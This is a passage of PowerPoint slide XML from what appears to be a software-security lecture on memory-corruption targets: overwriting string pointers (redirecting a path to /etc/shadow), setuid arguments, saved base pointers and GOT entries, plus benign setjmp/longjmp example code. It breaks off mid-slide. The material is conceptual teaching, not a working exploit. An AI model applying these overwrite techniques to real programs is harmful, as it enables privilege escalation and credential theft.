              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any reference to a value that can be overwritten can represent a security vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers to strings or array contents (e.g., "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>t.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" becomes “/etc/shadow”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer values (e.g., value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variable that is passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of the saved base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By overwriting the old base pointer it is possible to force the process to use a function frame determined by the attacker when returning from a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An additional return operation would jump to a destination selected by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of a function pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of the GOT entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() to point to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will invoke the code when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() is invoked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81989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36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36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36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36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236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236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2361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2361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236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7732" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Overwritten: Long Jumps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097733" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() are used to perform non-local, inter-procedural direct control transfer from one point in a program to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to a "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" that restores the program state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call saves the context of a program in a data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When used to save the environment, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) returns 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call restores the context of the program to its original state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is called, it is as if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) returned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This mechanism can be used to perform exception/error handling and to implement user-space threading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2704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77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977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977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9773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9773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9773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9773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9783" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>setjmp() and longjmp()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099784" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) != 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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 %d\n",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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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 %d\n",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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    f1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099785" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>f2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (check == error) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(e, ERROR2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    /* unreachable */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
